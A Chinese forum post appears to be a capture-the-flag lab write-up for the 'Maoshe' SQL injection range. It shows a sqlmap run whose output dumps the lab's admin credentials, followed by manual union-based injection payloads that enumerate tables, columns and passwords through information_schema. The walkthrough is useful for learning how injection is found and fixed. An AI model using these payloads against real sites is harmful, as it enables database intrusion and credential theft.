封神台 SQL注入 靶场 (猫舍)手动注入

打印 上一主题 下一主题

主题 386|帖子 386|积分 1158

封神台 SQL注入 靶场 (猫舍)手动注入

靶园地址  http://pu2lh35s.ia.aqlab.cn/?id=1
使用脚本


  • 可以直接使用sqlmap脚本 直接 对这个地址进行测试 不过这样实在是太没意思了
  • 这里使用的是 sqlmap 二次开发的 sqlmapplus 脚本 sqlmap 也是一样的
  1. sqlmapX -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D "maoshe"  --dump  --batch --random-agent
  2.         ___
  3.        __H__
  4. ___ ___["]_____ ___ ___  {1.8#stable}
  5. |_ -| . [.]     | .'| . |
  6. |___|_  [.]_|_|_|__,|  _|
  7.       |_|V...       |_|   https://sqlmap.org
  8. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  9. [*] starting @ 20:46:16 /2024-10-12/
  10. [20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/user-agents.txt'
  11. [20:46:17] [INFO] resuming back-end DBMS 'mysql'
  12. [20:46:17] [INFO] testing connection to the target URL
  13. sqlmap resumed the following injection point(s) from stored session:
  14. ---
  15. Parameter: id (GET)
  16.     Type: boolean-based blind
  17.     Title: AND boolean-based blind - WHERE or HAVING clause
  18.     Payload: id=1 AND 8425=8425
  19.     Type: time-based blind
  20.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  21.     Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
  22. ---
  23. [20:46:17] [INFO] the back-end DBMS is MySQL
  24. web server operating system: Windows
  25. web application technology: PHP 5.4.45, Apache 2.4.23
  26. back-end DBMS: MySQL >= 5.0.12
  27. [20:46:17] [INFO] fetching tables for database: 'maoshe'
  28. [20:46:17] [INFO] fetching number of tables for database 'maoshe'
  29. [20:46:17] [INFO] resumed: 4
  30. [20:46:17] [INFO] resumed: admin
  31. [20:46:17] [INFO] resumed: dirs
  32. [20:46:17] [INFO] resumed: news
  33. [20:46:17] [INFO] resumed: xss
  34. [20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
  35. [20:46:17] [INFO] resumed: 3
  36. [20:46:17] [INFO] resumed: Id
  37. [20:46:17] [INFO] resumed: username
  38. [20:46:17] [INFO] resumed: password
  39. [20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
  40. [20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
  41. [20:46:17] [INFO] resumed: 2
  42. [20:46:17] [INFO] resumed: 1
  43. [20:46:17] [INFO] resumed: hellohack
  44. [20:46:17] [INFO] resumed: admin
  45. [20:46:17] [INFO] resumed: 2
  46. [20:46:17] [INFO] resumed: zkaqbanban
  47. [20:46:17] [INFO] resumed: ppt
  48. Database: maoshe
  49. Table: admin
  50. [2 entries]
  51. +----+------------+----------+
  52. | Id | password   | username |
  53. +----+------------+----------+
  54. | 1  | hellohack  | admin    | ## 这里已经发现了 flag
  55. | 2  | zkaqbanban | ppt      |
  56. +----+------------+----------+
  57. [20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/admin.csv'
  58. [20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
  59. [20:46:17] [INFO] resumed: 3
  60. [20:46:17] [INFO] resumed: id
  61. [20:46:17] [INFO] resumed: user
  62. [20:46:17] [INFO] resumed: pass
  63. [20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
  64. [20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
  65. [20:46:17] [INFO] resumed: 0
  66. [20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
  67. Database: maoshe
  68. Table: xss
  69. [0 entries]
  70. +----+------+--------+
  71. | id | pass | user   |
  72. +----+------+--------+
  73. +----+------+--------+
  74. [20:46:17] [INFO] table 'maoshe.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/xss.csv'
  75. [20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
  76. [20:46:17] [INFO] resumed: 2
  77. [20:46:17] [INFO] resumed: id
  78. [20:46:17] [INFO] resumed: content
  79. [20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
  80. [20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
  81. [20:46:17] [INFO] resumed: 3
  82. [20:46:17] [INFO] resumed:
  83. [20:46:17] [INFO] resumed: 1
  84. [20:46:17] [INFO] resumed: <h1>
  85. [20:46:17] [INFO] resumed: 2
  86. [20:46:17] [INFO] resumed: <h1>
  87. [20:46:17] [INFO] resumed: 3
  88. Database: maoshe
  89. Table: news
  90. [3 entries]
  91. +----+-----------------------------------------------------------------+
  92. | id | content                                                         |
  93. +----+-----------------------------------------------------------------+
  94. | 1  |  |
  95. | 2  | <h1>                                                            |
  96. | 3  | <h1>                                                            |
  97. +----+-----------------------------------------------------------------+
  98. [20:46:18] [INFO] table 'maoshe.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/news.csv'
  99. [20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
  100. [20:46:18] [INFO] resumed: 1
  101. [20:46:18] [INFO] resumed: paths
  102. [20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
  103. [20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
  104. [20:46:18] [INFO] resumed: 0
  105. [20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
  106. Database: maoshe
  107. Table: dirs
  108. [0 entries]
  109. +-------+
  110. | paths |
  111. +-------+
  112. +-------+
  113. [20:46:18] [INFO] table 'maoshe.dirs' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/dirs.csv'
  114. [20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn'
  115. [*] ending @ 20:46:18 /2024-10-12/
复制代码
手动注入

判断是否存在 SQL注入漏洞


  • 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的


  • 尝试 1=2

  • 这里报错了 说明存在 注入漏洞
使用 order by 语句 判断数据库字段数


  • 构造?id=1 and 1=1 order by 1 页面没有变化(order by 1表现根据第一列来排序,一般也是如此默认升序的)
  • 再来依次构造order by 2 / order by 3
  • 由MySQL的语法有,order by后面的数据凌驾列数后将会报错,因此用种方法来判断一共有几个字段



  • order by 1/order by 2 都没有任何问题 但是 order by 3 报错了
使用联合查询判断回显点


  • 回显点就是在页面中能显示数据库信息的板块,比如有的网页中“浏览次数”“发布时间”等,都反应的是数据库中的数据
  • 在MySQL语句中,页面一次只能显示一行查询的内容,而且是先查后显示,于是我们需要让前面的语句?id=1 and 1=1这句话失效,从而显示union select 1,2的内容
  • 因此我们让前一个命令报错无法显示,即构造?id=1 and 1=2,后面照常union select 1,2

使用回显点 查询相关的数据


  • 查询当前数据库的名称


  • 已知2为回显点,我们只需要在联合查询时将2更换为我们想要查询到部位名称即可
  • 可以查询当前的数据库名,将2更换为database()
  • 构造id=1 and 1=2 union select 1,database()

  • 数据库名为maoshe

  • 查询数据库中的表名


  • 构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
  • limit 0,1的意思是从0开始,查询第1个数据


  • 只要修改后面的 limit 0,1 /limit 1,1/limit 2,1 就可以看到后面的表名了
  • 说明后面 的数据库的表 分别是 admin dirs news xss
  • 而当后面是 limit 4,1 的时候 就是空白的 说明只有四张表 而管理员的信息一般都存在 admin 中

  • 查询admin表的列名


  • 构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1

  • 同样 修改后面的 limit 0,1 就可以看到 后面的列名 第一列是 id 第二列是 username 第三列 则是password
  • 现在所有的信息都找到了 直接查询就可以了

  • 查询需要的信息


  • 构造 ?id=1 and 1=2 union select 1,username from admin

  • 构造 ?id=1 and 1=2 union select 1,password from admin where username = 'admin'

结束


  • Flag 已经找到了 也就是 管理员的暗码 hellohack

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

梦应逍遥

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表